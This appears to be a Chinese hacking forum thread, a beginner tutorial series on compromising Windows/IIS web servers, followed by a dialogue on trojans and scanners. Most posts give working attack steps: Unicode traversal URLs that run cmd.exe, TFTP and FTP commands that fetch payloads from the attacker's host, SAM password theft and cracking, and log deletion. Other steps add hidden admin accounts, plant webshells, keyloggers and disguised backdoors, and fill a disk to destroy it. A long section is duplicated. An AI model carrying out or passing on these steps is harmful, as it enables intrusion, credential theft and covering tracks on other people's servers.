對漏洞大家可能不太瞭解,我這裏也不能一一說明了,太多了,感興趣的話去論壇找freedom吧!
目前廣泛利用和存在的漏洞有:unicode,unicode後續,iis溢出,.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至於如何確定,呵呵,絕對不會是一行一行地在ie中試吧,拿出x-scan吧,很好的掃描器哦!
稍微設置一下就上路吧!過了一會,呵呵,報告出來了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細的信息,大家看吧,總比我說的準了。
現在這臺主機已經和我們成爲親戚了,要讓這位親愛的親戚做點事,就要開始各種***了,下回我們就探討一下最最可愛的unicode漏洞,各位可能就會在unicode中完成第一次***體驗
六樓
基礎知識(中)

上傳,這個我們後面介紹。
幾點忠告:
1,對於沒有主頁的機器(就是正在建立的主頁),不要改它,這很沒水準,也很沒道德
2,echo前記得幫他們做好備份
3,不準在主頁里加入惡性語句
2,下載文件
要是有什麼有用的文件被你發現,那我們如何下載呢?
最簡單的方法:把文件copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然後,下載11.11.22.22/baby.zip就行了,注意!實際應用中要記得對文件名進行修改,總之不能暴露。
別的方法:對不起,沒想好:)
3,最重要的上傳
一般方法:ftp法
首先建一個ftp腳本文件:c:\hehe.haha(名字亂取把),申請一個ftp賬號,然後用echo吧
echo+open ftp.cshu.com(ftp主機) > c:\hehe.haha
echo+user yourname >> cc:\hehe.haha (yourname是用戶名)
echo+yourpasswd >> c:\hehe.haha (yourpasswd是密碼)
echo+get setup.exe >> c:\hehe.haha 要下載的文件
echo+quit >> c:\hehe.haha
完了以後:ftp+/s:c:\hehe.haha,由於是ftp主機,那麼速度一定很快,過一會setup.exe就會出現在當前目錄了(也就是cmd所在目錄)
別忘了先上傳到ftp主機,不要做馬大哈哦!
最簡單的方法:tftp法。
這種方法不用中轉服務器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp服務器,利用漏洞機器來下載(注意,運行tftp時不要運行其他的ftp軟件)
在這裏我推薦cisco tftp server,自己去找找把,實在沒有來找我:)
安裝好後運行,別忘了設置好默認目錄,否則會找不到文件
tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默認目錄裏)
1.2.3.4爲你的ip,用unicode運行一下,會看到tftp server裏有反應了,這就好了,不一會,文件就傳上去了,方便把!
學會了上傳,我們就可以好好改主頁,還可以上傳***,還可以把程序放上去運行…………(運行程序和在dos裏一樣)
4,如何清除痕跡
雖然國內主機紀錄ip的不是很多,但萬事小心爲妙,unicode權限達不到admin。用cleaniislog行不通,就…………直接刪吧!
C:\winnt\system32\logfiles\*.*
C:\winnt\ssytem32\config\*.evt
C:\winnt\system32\dtclog\*.*
C:\winnt\system32\*.log
C:\winnt\system32\*.txt
C:\winnt\*.txt
C:\winnt\*.log
全……擦掉!
四,細節問題。
1,遇到長文件名怎麼辦?
c:\program files\
就用c:\"program20%files"\
2,遇到空格怎麼辦?
%代替嘍,或者xx yy=xxyy~1
基礎知識(5)

%代替嘍,或者xx yy=xxyy~1
3,如何做個很大的文件?
目的就是破壞啦!我不喜歡不過教教你們啦
@echo off
echo big > c:\a.a
:h
copy c:\a.a+c:\a.a c:\a.a
goto h
注意不要亂來啊!
4,輸入命令,沒反應或反應不對。
:)請檢查檢查再檢查命令的正確性,可能沒有漏洞,那就閃人!看在你看到這裏那麼給我面子的份上,在給你幾個吧!
http://www.exsample.com/scripts/ ... macr;..&Agrave;
&macr;../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:\
不一定有用哦!
5,如何找到unicode漏洞的主機
呵呵:)最好的方法自然是………………一個一個ping,一個一個試嘍:)
不要打我呀!我說我說。最好找一個cgi掃描器,unicode查找器多如牛毛,隨便找個吧!
6,我copy,del文件,怎麼顯示aceess denined?
這個不好辦了,由於unicode所擁有的權限有限,出現上述情況很正常,我們要做的便是提高自己的權限!
這個我會在今後介紹,現在你可以試試attrib
attrib -r -h -s c:\autoexec.bat
再對autoexec.bat進行操作,看看有沒有效果,成功率不高,不好意思!
7,我黑了主頁,天下無敵?
我本來想對你說:“見你的鬼去吧!”不過想想不大禮貌,有失我紳士風度,所以改個口
echo主頁或改主頁在不懂***的人看起來很了不起,不過,它最多算是一個基礎,拿到admin纔是我們的終極目標!
對cshu全體成員來說,不準去改正在建立的網頁!這是我們的原則!
要是你想耍耍威風,那也可以理解,那就去黑外國的,或者url欺騙也是個好選擇
8,我如何做更多的事?
第一,努力提高權限
第二,由於cmd的限制,我們可以做的不多,那就要程序幫忙,上傳吧!切記,要隱祕!

一,frontpage擴展***。
爲什麼把它放第一位呢?原因很簡單,它最最方便,frontpage服務器擴展是一種方便的遠程站點管理功能,可是由於某些網管注意文明用語的疏忽(爲什麼注意文明用語滿街飛?)不設置訪問密碼,如果那樣的話,我們只要用一個frontpage就可以黑它了!!這完全不是***工具,但它確實辦到了,還要感謝注意文明用語網管和微軟啊!
具體做法:
1,準備frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。
2,找一臺有frontpage擴展的主機,可以用流光,也可以用搜索引擎查找/_vti_pvt/,這是frontpage擴展的標誌。
3,接下來打開frontpage,(媽媽:你在幹什麼?回答:做網頁!媽媽:好孩子!)文件菜單下選擇“打開站點”,然後在文件夾框裏寫入 http://11.11.22.22(我習慣用這個做例子

七樓
基礎知識(下)

net user iusr_machinename cshu (把它的密碼設爲cshu)
net localgroup administrators iusr_machinename /add(加入administrators組)
這樣我們就擁有了iusr_machinename這一賬號,admin權限,簡單吧!
熟悉一下net use 命令:
net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接
copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 複製到機器c:\winnt\system32上,若是c$.d$,就表示c,d盤
net time \\11.11.22.22 看到了時間了,比如是8點
at \\11.11.22.22 8:03 haha.exe 就會在8點3分執行。
net use \\11.11.22.22 /delete 斷開連接
應該是很簡單的。這樣我們就可以隨心所欲地操作11.11.22.22了,admin是最高權限,所以沒有限制的:)
是不是很簡單?所以我是溢出是很厲害的***方法。
3389知道吧!如果能進入,那麼用上面的命令也可以輕易拿到admin的,不過呢,有3389漏洞的機器已經不多了。看你運氣了!(本站有幾篇關於3389的好文章)
總的來說,還是unicode的機器最多,爲什麼注意文明用語網管不會滅絕呢:)雖然unicode拿admin有一定難度,但還是要試試的。
首先,我們檢查一下unicode在這臺機器上的權限,一般看讀寫權限和運行權限。用copy 或del命令便可確定讀寫權限,然後上傳文件運行一下便可知道運行權限。
1,如果我們可以對winnt\repair和winnt\config進行訪問,sam文件就在裏面(win2k裏是sam,nt4裏是sam._)那麼用tftp 把get改成put下載下來,或者把它複製到inetpub\wwwroot下,改成zip下載。
拿到sam後,用lc3破解版暴力破解吧,這種方法比較費時。
2,要是有運行權限,拿就拋個***上去吧!雖說***可能也會沒有權限,但自啓動的模式在admin登陸後可能會自己提升了權限。要注意的是,最好放最新的***,因爲***很容易被殺毒軟件查殺!
3,其實和2差不多,只不過變成了鍵盤記錄器,選個國產的,一般殺毒軟件不會殺出來,認真配置好後傳上去,下線睡覺或是做家務去!等到網管用了機器,密碼就會被紀錄下來,我們在去取,admin就順利到手了:)
4,getadmin和pipeupadmin,前者是nt4用的,後者是2000。看看幫助知道使用方法後(其實猜都猜得到)就可以提升一個用戶的權限,有一步登天的感覺!
5,手工做個bat文件,裏面是建立用戶等命令,然後把它放到自啓動下,有很多途徑:documents and settings下的開始菜單下的啓動,知道了吧,至於要順利放進去的話,會遇到空格長名等等問題,就看你的基本功了。win.ini裏有load,加進去。還有便是註冊表,好好研究一下regedit.
6,本地溢出。這個比較高深,我能告訴大家的只是,去四處找找本地溢出程序。
總的來說,unicode改主頁是非常簡單的,但是若是要取得更高的權限,就要一番努力,上面的方法只是些思路,實際操作時需要具體處理,開動腦筋,把方法都結合起來。(是不是聽起來有點玄?)
想想好像沒有什麼其他的途徑要說了,什麼?linux,呵呵,我還不大懂,就不在這裏瞎說了。
那今天就說到這裏了,6裏面我會說說後門製作,小問題和我的一點經驗。期待吧!
 
這是最後一節了,寫的傻傻的,但我畢竟堅持下來了,值得鼓勵!(偶爾阿q一下)在寫菜鳥操的同時,我們的cshu(cshu.51.net)也在默默成長,但現在我要準備離開了,真是有點捨不得。在今後的日子裏,還請大家多多支持cshu和christ,freedom他們。
今天說點什麼呢?沒有主題,亂談一通吧!
首先我要吐一次血,當然是爲了推薦一樣東西,就是流光!(那麼沒創意,老土!)不管怎麼說,小榕的流光應該是中國第一黑軟,他綜合了諸多的***手段,使***便捷化,當然可能讓我們養成了懶惰的習慣。不會用流光的最好去學學。
我來說說我自己覺得最有用的幾個項目:
1,探測----掃描pop3/ftp/nt/sql主機,要是無目的地黑,那麼用這個再合適不過了。進去後填好ip範圍(範圍可以掃大一點,它很快的),至於類型嘛,要是你要一大堆unicode,那麼選擇iis/frontpage再合適不過了,要是要更高的權限,sql是不錯的選擇。完成後,表格裏會多出一大堆東西。
remote execute-x 這是幾種不同的unicode,用它比用ie來執行方便多了,但是echo有問題(是我自己不會,會的朋友快教我)
remote ftp pcaw file method-x 這是遠程獲取pc anywhere的密碼文件,要使用的話,你首先要有一個ftp賬號,去申請吧!順利拿到cif文件後,用流光自帶的工具就可以解開密碼,很爽的!
remote ftp sam -x 拿sam的,還是用最好的lc3來解吧!
frontpage extended 這是frontpage擴展,不過不要高興,是要密碼的。但是若是後面跟了privilege hole的話,放聲大笑吧!(小心不要讓鄰居拿着菜刀衝進來)打開frontpage,打開站點, http://ip就可以了!(http://不要忘)
此外還有一點變通,大家肯定讀的懂的。
2,探測----高級掃描工具。這可是流光4中的重頭戲,綜合了很多漏洞,還可以用plugin功能加入新的漏洞。這項功能很適合對某一站點進行探測,很快掃出漏洞後,流光會生成一個報告文件,其中包含漏洞的連接,要是你看不懂的話,建議你拿出x-scan,裏面有漏洞描述的。
3,工具----nt管道遠程命令,種植者,這兩項功能對我們***nt來說是相當好用的。但前提是要有賬號,相信在此之前你應該有幾個了吧,那就快點試試吧!
總的來說,流光的使用是非常簡單的,其中也有不少工具值得我們一用,tools目錄裏有一些很好的工具,exploit裏則有很多溢出***程序,前提是你應該會c,不會的話我也沒辦法,學會c起碼要看10倍於菜鳥操的資料吧!另外給大家推薦一個站點:www.hack.co.za,有什麼漏洞的話就去那裏找找,你會有所收穫的。

然後我想說說一些黑站的經驗。
☆當我們用unicode控制一臺機器時,我向大家推薦用asp***,阿新的改良版,本站有下載的。上傳asp文件前不要忘了修改list.asp中的地址信息,最好也放一個cmd.asp上去,運氣好的話,可以運行命令的。
上傳好後,ie裏輸入其中index.asp的地址,呵呵,我們就能方便地管理其中的文件了,可以改網頁,改代碼,上傳腳本文件麻煩?那就用它來生成吧!
推薦他的最大原因便是----便於隱藏!一般網站總有一個龐大的目錄,選擇一個深的,放進去,網管很難發現的:)
最後對大家說一句,要是有備份目錄(很多網站都有的),最好也放一份進去。有一次我用這個東西修改一家網站的首頁,改了兩三次網管也沒刪掉,可是突然一天不行了,原來他用了備份的網頁(還算機靈吧)
☆我想對大家說,對於國內網站,最好不要惡意去***,因爲我們是中國人嘛!在5/1期間,我發現有一些國內站點被黑,留下的頁面上不是poison box,而是中國人的話,這真是無恥到了極點!!!!大家千萬不要學哦。還有,現在網上有很多還沒有網頁的主機,往往有很多漏洞,對於這種機器,竟有一些小人也會去改收頁(比如上海那個姓楊的小子)這算什麼?顯示實力,炫耀技術?呵呵,見鬼去吧!
我的建議是,不要改它的首頁,而是努力去拿admin,控制它,這樣我們有很多選擇:肉雞,等它有正式主頁後可以黑,或者把我們的主頁放上去!比申請好多了,權限又足!當然很危險:)這樣做是不是有品位多了?
☆要是我們拿到了admin,但有時卻不能執行一些命令,那很可能是因爲服務啓動的問題。試着用以下命令:
net start termservice 啓動win2k的終端控制
net start workstation 打開net use 功能
net start lanmanserver 打開ipc
net start eventlog 啓動日誌(你不會那麼傻吧!stop)
net start schedule 打開計劃(at)
net start server 共享
還有很多,net命令裏去找吧!
☆打開telnet
1,遠程去運行ntlm.exe,流光裏有
2,net stop telnet
3, net start telnet
☆我推薦幾種後門:winshell(默認端口5277)相對於srv,它好一些。remotenc這個是榕哥的作品,可以以指定用戶執行,還可以自己起服務的名字,很棒的!
至於服務的名字,建議大家去看看win2k的進程名,學着起相類似的名字,要做到使網管看到了也不會引起警覺,或是有警覺也不敢去刪,呵呵,這樣就最好了!
☆代理問題。我推薦大家自己去做代理,控制了一臺機器後,用snake前輩寫的skserver去做個sock5。
具體做法就不詳細說了,因爲比較普通,只要熟悉一下用法就可以了。
做好了sock5,我們可以上oicq,下棋都用它,sock5代理可是很少見的哦!
要是實在拿不到sock5,用http也可以,這裏推薦一個軟件tcp2http,它具有很多功能。在給個站點:dzc.126.com國內最最好的的代理站點,怕死的朋友千萬不要錯過。
最後說說一些對於菜鳥同志的建議:
不要把黑當作一種顯示自己的行爲,要是你想耍威風,用url欺騙來騙mm最合適了,還可以弄個yahoo什麼的……
不要在一項技術上停留過長時間,當你熟練掌握後,應該迅速學習下一個新技術。
不要和被你黑的網管過多接觸,前車之鑑哦。
對於一臺好機器要做好後門,不要輕易失去它。
想好好學***的話,就常去各大論壇轉轉,仔細讀教程,忘記聊天室和網絡遊戲吧!
實踐是最好的教程,再次重申!
應該多學計算機的其他方面的知識,任何知識在一定場合都是有用的。
編程技術……好像太難了,不過再難也要學。
想不出來了………………
好了,我們的菜鳥操終於結束了,我這個大菜鳥也可以退休了,拼搏一年後我會回來的。第一節裏我曾許諾讓大家學會黑站,不知道大家是否成功了,不管這麼樣,我們都該不斷的努力學習,不是嗎?
[ 本帖最後由 あ帥氣十足あ 於 2007-2-23 14
八樓
基礎知識(下)

net user iusr_machinename cshu (把它的密碼設爲cshu)
net localgroup administrators iusr_machinename /add(加入administrators組)
這樣我們就擁有了iusr_machinename這一賬號,admin權限,簡單吧!
熟悉一下net use 命令:
net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接
copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 複製到機器c:\winnt\system32上,若是c$.d$,就表示c,d盤
net time \\11.11.22.22 看到了時間了,比如是8點
at \\11.11.22.22 8:03 haha.exe 就會在8點3分執行。
net use \\11.11.22.22 /delete 斷開連接
應該是很簡單的。這樣我們就可以隨心所欲地操作11.11.22.22了,admin是最高權限,所以沒有限制的:)
是不是很簡單?所以我是溢出是很厲害的***方法。
3389知道吧!如果能進入,那麼用上面的命令也可以輕易拿到admin的,不過呢,有3389漏洞的機器已經不多了。看你運氣了!(本站有幾篇關於3389的好文章)
總的來說,還是unicode的機器最多,爲什麼注意文明用語網管不會滅絕呢:)雖然unicode拿admin有一定難度,但還是要試試的。
首先,我們檢查一下unicode在這臺機器上的權限,一般看讀寫權限和運行權限。用copy 或del命令便可確定讀寫權限,然後上傳文件運行一下便可知道運行權限。
1,如果我們可以對winnt\repair和winnt\config進行訪問,sam文件就在裏面(win2k裏是sam,nt4裏是sam._)那麼用tftp 把get改成put下載下來,或者把它複製到inetpub\wwwroot下,改成zip下載。
拿到sam後,用lc3破解版暴力破解吧,這種方法比較費時。
2,要是有運行權限,拿就拋個***上去吧!雖說***可能也會沒有權限,但自啓動的模式在admin登陸後可能會自己提升了權限。要注意的是,最好放最新的***,因爲***很容易被殺毒軟件查殺!
3,其實和2差不多,只不過變成了鍵盤記錄器,選個國產的,一般殺毒軟件不會殺出來,認真配置好後傳上去,下線睡覺或是做家務去!等到網管用了機器,密碼就會被紀錄下來,我們在去取,admin就順利到手了:)
4,getadmin和pipeupadmin,前者是nt4用的,後者是2000。看看幫助知道使用方法後(其實猜都猜得到)就可以提升一個用戶的權限,有一步登天的感覺!
5,手工做個bat文件,裏面是建立用戶等命令,然後把它放到自啓動下,有很多途徑:documents and settings下的開始菜單下的啓動,知道了吧,至於要順利放進去的話,會遇到空格長名等等問題,就看你的基本功了。win.ini裏有load,加進去。還有便是註冊表,好好研究一下regedit.
6,本地溢出。這個比較高深,我能告訴大家的只是,去四處找找本地溢出程序。
總的來說,unicode改主頁是非常簡單的,但是若是要取得更高的權限,就要一番努力,上面的方法只是些思路,實際操作時需要具體處理,開動腦筋,把方法都結合起來。(是不是聽起來有點玄?)
想想好像沒有什麼其他的途徑要說了,什麼?linux,呵呵,我還不大懂,就不在這裏瞎說了。
那今天就說到這裏了,6裏面我會說說後門製作,小問題和我的一點經驗。期待吧!
 
這是最後一節了,寫的傻傻的,但我畢竟堅持下來了,值得鼓勵!(偶爾阿q一下)在寫菜鳥操的同時,我們的cshu(cshu.51.net)也在默默成長,但現在我要準備離開了,真是有點捨不得。在今後的日子裏,還請大家多多支持cshu和christ,freedom他們。
今天說點什麼呢?沒有主題,亂談一通吧!
首先我要吐一次血,當然是爲了推薦一樣東西,就是流光!(那麼沒創意,老土!)不管怎麼說,小榕的流光應該是中國第一黑軟,他綜合了諸多的***手段,使***便捷化,當然可能讓我們養成了懶惰的習慣。不會用流光的最好去學學。
我來說說我自己覺得最有用的幾個項目:
1,探測----掃描pop3/ftp/nt/sql主機,要是無目的地黑,那麼用這個再合適不過了。進去後填好ip範圍(範圍可以掃大一點,它很快的),至於類型嘛,要是你要一大堆unicode,那麼選擇iis/frontpage再合適不過了,要是要更高的權限,sql是不錯的選擇。完成後,表格裏會多出一大堆東西。
remote execute-x 這是幾種不同的unicode,用它比用ie來執行方便多了,但是echo有問題(是我自己不會,會的朋友快教我)
remote ftp pcaw file method-x 這是遠程獲取pc anywhere的密碼文件,要使用的話,你首先要有一個ftp賬號,去申請吧!順利拿到cif文件後,用流光自帶的工具就可以解開密碼,很爽的!
remote ftp sam -x 拿sam的,還是用最好的lc3來解吧!
frontpage extended 這是frontpage擴展,不過不要高興,是要密碼的。但是若是後面跟了privilege hole的話,放聲大笑吧!(小心不要讓鄰居拿着菜刀衝進來)打開frontpage,打開站點, http://ip就可以了!(http://不要忘)
此外還有一點變通,大家肯定讀的懂的。
2,探測----高級掃描工具。這可是流光4中的重頭戲,綜合了很多漏洞,還可以用plugin功能加入新的漏洞。這項功能很適合對某一站點進行探測,很快掃出漏洞後,流光會生成一個報告文件,其中包含漏洞的連接,要是你看不懂的話,建議你拿出x-scan,裏面有漏洞描述的。
3,工具----nt管道遠程命令,種植者,這兩項功能對我們***nt來說是相當好用的。但前提是要有賬號,相信在此之前你應該有幾個了吧,那就快點試試吧!
總的來說,流光的使用是非常簡單的,其中也有不少工具值得我們一用,tools目錄裏有一些很好的工具,exploit裏則有很多溢出***程序,前提是你應該會c,不會的話我也沒辦法,學會c起碼要看10倍於菜鳥操的資料吧!另外給大家推薦一個站點:www.hack.co.za,有什麼漏洞的話就去那裏找找,你會有所收穫的。

然後我想說說一些黑站的經驗。
☆當我們用unicode控制一臺機器時,我向大家推薦用asp***,阿新的改良版,本站有下載的。上傳asp文件前不要忘了修改list.asp中的地址信息,最好也放一個cmd.asp上去,運氣好的話,可以運行命令的。
上傳好後,ie裏輸入其中index.asp的地址,呵呵,我們就能方便地管理其中的文件了,可以改網頁,改代碼,上傳腳本文件麻煩?那就用它來生成吧!
推薦他的最大原因便是----便於隱藏!一般網站總有一個龐大的目錄,選擇一個深的,放進去,網管很難發現的:)
最後對大家說一句,要是有備份目錄(很多網站都有的),最好也放一份進去。有一次我用這個東西修改一家網站的首頁,改了兩三次網管也沒刪掉,可是突然一天不行了,原來他用了備份的網頁(還算機靈吧)
☆我想對大家說,對於國內網站,最好不要惡意去***,因爲我們是中國人嘛!在5/1期間,我發現有一些國內站點被黑,留下的頁面上不是poison box,而是中國人的話,這真是無恥到了極點!!!!大家千萬不要學哦。還有,現在網上有很多還沒有網頁的主機,往往有很多漏洞,對於這種機器,竟有一些小人也會去改收頁(比如上海那個姓楊的小子)這算什麼?顯示實力,炫耀技術?呵呵,見鬼去吧!
我的建議是,不要改它的首頁,而是努力去拿admin,控制它,這樣我們有很多選擇:肉雞,等它有正式主頁後可以黑,或者把我們的主頁放上去!比申請好多了,權限又足!當然很危險:)這樣做是不是有品位多了?
☆要是我們拿到了admin,但有時卻不能執行一些命令,那很可能是因爲服務啓動的問題。試着用以下命令:
net start termservice 啓動win2k的終端控制
net start workstation 打開net use 功能
net start lanmanserver 打開ipc
net start eventlog 啓動日誌(你不會那麼傻吧!stop)
net start schedule 打開計劃(at)
net start server 共享
還有很多,net命令裏去找吧!
☆打開telnet
1,遠程去運行ntlm.exe,流光裏有
2,net stop telnet
3, net start telnet
☆我推薦幾種後門:winshell(默認端口5277)相對於srv,它好一些。remotenc這個是榕哥的作品,可以以指定用戶執行,還可以自己起服務的名字,很棒的!
至於服務的名字,建議大家去看看win2k的進程名,學着起相類似的名字,要做到使網管看到了也不會引起警覺,或是有警覺也不敢去刪,呵呵,這樣就最好了!
☆代理問題。我推薦大家自己去做代理,控制了一臺機器後,用snake前輩寫的skserver去做個sock5。
具體做法就不詳細說了,因爲比較普通,只要熟悉一下用法就可以了。
做好了sock5,我們可以上oicq,下棋都用它,sock5代理可是很少見的哦!
要是實在拿不到sock5,用http也可以,這裏推薦一個軟件tcp2http,它具有很多功能。在給個站點:dzc.126.com國內最最好的的代理站點,怕死的朋友千萬不要錯過。
最後說說一些對於菜鳥同志的建議:
不要把黑當作一種顯示自己的行爲,要是你想耍威風,用url欺騙來騙mm最合適了,還可以弄個yahoo什麼的……
不要在一項技術上停留過長時間,當你熟練掌握後,應該迅速學習下一個新技術。
不要和被你黑的網管過多接觸,前車之鑑哦。
對於一臺好機器要做好後門,不要輕易失去它。
想好好學***的話,就常去各大論壇轉轉,仔細讀教程,忘記聊天室和網絡遊戲吧!
實踐是最好的教程,再次重申!
應該多學計算機的其他方面的知識,任何知識在一定場合都是有用的。
編程技術……好像太難了,不過再難也要學。
想不出來了………………
好了,我們的菜鳥操終於結束了,我這個大菜鳥也可以退休了,拼搏一年後我會回來的。第一節裏我曾許諾讓大家學會黑站,不知道大家是否成功了,不管這麼樣,我們都該不斷的努力學習,不是嗎?
 
九樓
***常用兵器之***篇(下)

 五
  “哈哈,你可知道除了冰河這樣的***經常使用的隱身技術外,更新、更隱蔽的方法已經出現,這就是―驅動程序及動態鏈接庫技術。驅動程序及動態鏈接庫技術和一般的***不同,它基本上擺脫了原有的***模式―監聽端口,而採用替代系統功能的方法改寫驅動程序或動態鏈接庫。這樣做的結果是:系統中沒有增加新的文件所以不能用掃描的方法查殺、不需要打開新的端口所以不能用端口監視的方法進行查殺、沒有新的進程所以使用進程查看的方法發現不了它,也不能用kill進程的方法終止它的運行。在正常運行時***幾乎沒有任何的症狀,而一旦***的控制端向被控端發出特定的信息後,隱藏的程序就立即開始運作。此類***通過改寫vxd文件建立隱藏共享的***,甚是隱蔽,我們上面的那些方法根本不會對這類***起作用。
  “可是前輩說的這種***晚生並沒有見到啊。”
笨蛋!你沒有見過,你怎麼知道我老人家也沒有見過?告訴你我已經看到了一個更加巧妙的***,它就是Share。運行Share***之前,我先把註冊表以及所有硬盤上的文件數量、結構用一個監控軟件DiskState記錄了起來,這個監控軟件使用128bit MD5的技術來捕獲所有文件的狀態,系統中的任何文件的變動都逃不過他的監視,這個軟件均會將它們一一指出。”
  “前輩我這裏第一次運行Share後,系統好像沒有動靜,使用Dllshow(內存進程察看軟件)觀看內存進程,似乎也沒有太大的變化。一般***都會馬上在內存駐留的,或許此***修改了硬盤上的文件。”
  “好,那麼你就接着用DiskState比較運行share.exe前後的記錄。”
  “程序顯示windows\applog裏面的目錄的一些文件和system.dat、user.dat文件起了變化,並沒有其他文件的增加和修改。”
  “系統中的applog目錄裏面存放了所有應用程序函數和程序調用的情況,而system.dat和user.dat則是組冊表的組成文件。你把applog目錄裏面的share.lgc打開來觀看,它的調用過程是什麼?”
  “調用過程如下:
  c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL"
  c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL"
  c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL"
  c15d4fd0 2623 "C:\WINDOWS\WIN.INI"
  c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL"
  c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL"
  c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE"
  c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL"
  但是爲什麼前輩我們看不到MSWINSCK.OCX或WSOCK2.VXD的調用呢?如果***想要進行網絡通訊,是會使用一些socket調用的。”
  “那麼接着你再觀察註冊表的變化。”
  “好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面,多了幾個鍵值,分別是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$,其內部鍵值如下:
  "Flags"=dword:00000302
  "Type"=dword:00000000
  "Path"="A:\\" 《-----路徑是A到F
  "Parm2enc"=hex:
  "Parm1enc"=hex:
  "Remark"="***帝國"
  ”
  “這就對了,然後你在瀏覽器的地址欄輸入\\111.111.111.1\CJT_C$。”
  “啊!居然把我的C盤目錄文件顯示出來了。”
  “現在你把CJT_C$改成matrix然後重啓計算機,接着在瀏覽器的地址欄輸入\\111.111.111.1\matrix。”
  “前輩也顯示C盤目錄文件了,很奇怪的是,在我的電腦裏面硬盤看上去並沒有共享啊?”
  “哈哈,那你再把"Flags"=dword:00000302的302改成402,reboot計算機。”
  “嘻嘻,硬盤共享已顯示出來了。那麼如何防止這種***那?”
“哈哈哈哈,這種***只不過用了一個巧妙的方法隱藏起來而已。你現在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部刪掉。如果你還放心不下,也可以把windows\system\下面的Vserver.vxd(Microsoft 網絡上的文件與打印機共享,虛擬設備驅動程序)刪掉,再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER鍵值刪掉。這樣就可以了。另外,對於驅動程序/動態鏈接庫***,有一種方法可以試試,使用Windows的〖系統文件檢查器〗,通過〖開始菜單〗-〖程序〗-〖附件〗-〖系統工具〗-〖系統信息〗-〖工具〗可以運行〖系統文件檢查器〗,用〖系統文件檢查器〗可檢測操作系統文件的完整性,如果這些文件損壞,檢查器可以將其還原,檢查器還可以從安裝盤中解壓縮已壓縮的文件。如果你的驅動程序或動態鏈接庫在你沒有升級它們的情況下被改動了,就有可能是***,提取改動過的文件可以保證你的系統安全和穩定。”
  六
  “此外很多人中***都會採用如下手段:
  1.先跟你套近乎,冒充成漂亮的美眉或者其他的能讓你輕信的人,然後想方設法的騙你點他發給你的***。
  2.把***用工具和其它的軟件捆綁在一起,然後在對文件名字進行修改,然後修改圖標,利用這些虛假的僞裝欺騙麻痹大意的人。
  3.另外一種方法就是把***僞裝好後,放在軟件下載站中,着收漁翁之利。
  所以我這裏提醒你一些常見的問題,首先是不要隨便從小的個人網站上下載軟件,要下也要到比較有名、比較有信譽的站點,通常這些網站的軟件比較安全。其次不要過於相信別人,不能隨便運行別人給的軟件。而且要經常檢查自己的系統文件、註冊表、端口等,而且多注意些安全方面的信息。再者就是改掉windows關於隱藏文件後綴名的默認設置,這樣可以讓我們看清楚文件真正的後綴名字。最後要提醒你的是,如果有一天你突然發現自己的計算機硬盤莫名其妙的工作,或者在沒有打開任何連接的情況下,貓還在眨眼睛,就立刻斷線,進行***的搜索。”
十樓
客常用兵器之掃面篇(上)
刀,兵器譜上排名第六。
  刀;
  一把好刀,光亮如雪;
  刃;
  一抹利刃,吹髮即斷;
  ***手中的掃描器如同刺客手中之刀,殺人、保命;***、補漏。
  如果一個***手中沒有一兩個掃描器,那麼他算不上是一個***,至少他是一個手裏沒有“刀”的***。沒有“刀”的***是難以生存的……】
  “前輩,您爲何如此看好掃描器?爲什麼***必須要有掃描器?”
  “後生,你上次***害我不淺,你這次又像搞什麼花樣?”
  “上次小生只是跟前輩開了一個玩笑,還望前輩見諒。”
  “罷了,我老人家還不止於和你如此一般見識。此次你又有什麼不清楚的?”
  “我不太清楚掃描器爲何會像您所說的有如此大的威力,掃描器在******中能起到什麼作用?”
  “看來你現在也是一個手裏沒有刀的***,掃描器在一個成熟的***手裏有着相當大的作用。因爲進化到會用掃描器一級的***,他們就會很少有人在對那些無知的個人用戶感興趣,注意力更多的被吸引到了服務器上。而對付服務器最好的方法就是找到服務器系統的漏洞,或者服務器相關軟件的漏洞。對於傳統的手工查找來說,不但查找漏洞的速度過於緩慢,而且多數情況下只能針對某一個特定的漏洞,感覺有點大海撈針的味道。而掃描器就是一種快速尋找服務器系統相關漏洞的工具,通過它們,***可以根據自己的帶寬和系統情況,以他們自己喜歡的速度和方式來快速的尋找系統漏洞,而且這多數掃描器可以同時掃描多種漏洞,很容易找到系統的漏洞和弱點,此時***就可以根據掃描器提供的漏洞報告和信息,採用合適的***方法對目標給以致命的一擊。”
  “前輩,那我如何找到掃描器,平時我好像很少接觸到這些東西啊。”
  “呵呵,你用過小榕的流光系列嗎?”
  “這個當然是接觸過了。”
  “其實小榕的流光就是一款結合強大掃描功能的軟件,只不過他在流光中加入了一些***和破解成份。”
“掃描器果然強大,我就曾用流光攻破過許多的黃色和反動網站,特別是他的FTP和新加入的SQLCMD功能,非常的強大。而且界面非常的友好,讓我這種菜鳥用戶很容易上手。”
 
